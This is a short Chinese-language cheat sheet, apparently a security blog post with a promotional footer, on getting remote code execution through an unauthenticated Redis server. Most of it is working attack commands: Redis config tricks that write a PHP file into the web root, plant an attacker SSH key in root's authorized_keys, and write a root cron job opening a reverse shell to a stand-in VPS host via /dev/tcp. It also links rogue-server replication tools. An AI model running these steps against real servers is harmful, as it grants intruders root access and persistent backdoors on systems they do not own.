未授权

可以利用超级弱口令工具来判断redis是否能未授权登录

telnet 
#尝试登录

info
#查看redis信息

RCE方法

写shell

• 需要写权限
• 需要知道web网站路径

config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

写SSH key

• 需要写入到 /.ssh 权限

创建秘钥

cd /root/.ssh/
ssh-keygen -t rsa

config set dir /root/.ssh/
config set dbfilename authorized_keys
set test "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCvhnGwlnksH9fuSnIUrcB9B07lgK9LOttwAGdCB0SxhTXElvZ3o6ZLtncQrJhDM30pjFuk17bFqzYmPNMnTEA3IueJ2/kuNBNsfax+7vMV9vwycm4v2bCGdIxRaSeQ8j0y613JC6ZJMHynEOAPe9k6r+K788iUXE0CJ2kPib7Cee9tGduoUKLwuPUwpJnFc+5feOtBv3NNiSBjb42c3vHNg/mWHYf6FD9JfgIC1rScNiFv+pOwUJQbsbfO7JFgSkBFqBwO5TtI60m/NSL+H3DNQqZ+1rlOzYnMqLs5Eh8dqqigN4DUskd5u8HRNBdp4o94yvcwEbcr2WpVE7S2Ztdfa2+IuB9gdoSa84iVLNzMMoqUFewTbBZPKPYh5uzhuECbrmmsEQZG/VeQM5ErgjC7n01Xsvykh7/zsVUWL3qOQv2VdbbCzIelZS912uyx/gZ3U6JMh5F3Ggza/1qQHyVPejOmVZLJADH+6TAXr9rdxp6pbDY0P0jTUP8DjsE5avE= f1ve@hacker\n\n"
save

ssh -i id_rsa root@ip

写计划任务

• 写入权限
• 仅适用于Centos

set x "\n* * * * * bash -i >& /dev/tcp/vps ip/55555 0>&1\n"
config set dir /var/spool/cron/
config set dbfilename root
save

主从复制

利用以下的工具来进行主从复制

https://github.com/n0b0dyCN/redis-rogue-server

https://github.com/vulhub/redis-rogue-getshell

参考：

6379 - Pentesting Redis | Chinese - Ht | HackTricks

 

微信公众号

扫一扫关注CatalyzeSec公众号

加入我们的星球，我们能提供：

1对1就业指导、面试模拟、Golang工具开发学习、Fofo高级会员、各公众号历史文章合集、各种网络安全电子书、面试题合集、最新poc、exp、最常用工具推荐、开放交流环境，解决成员问题。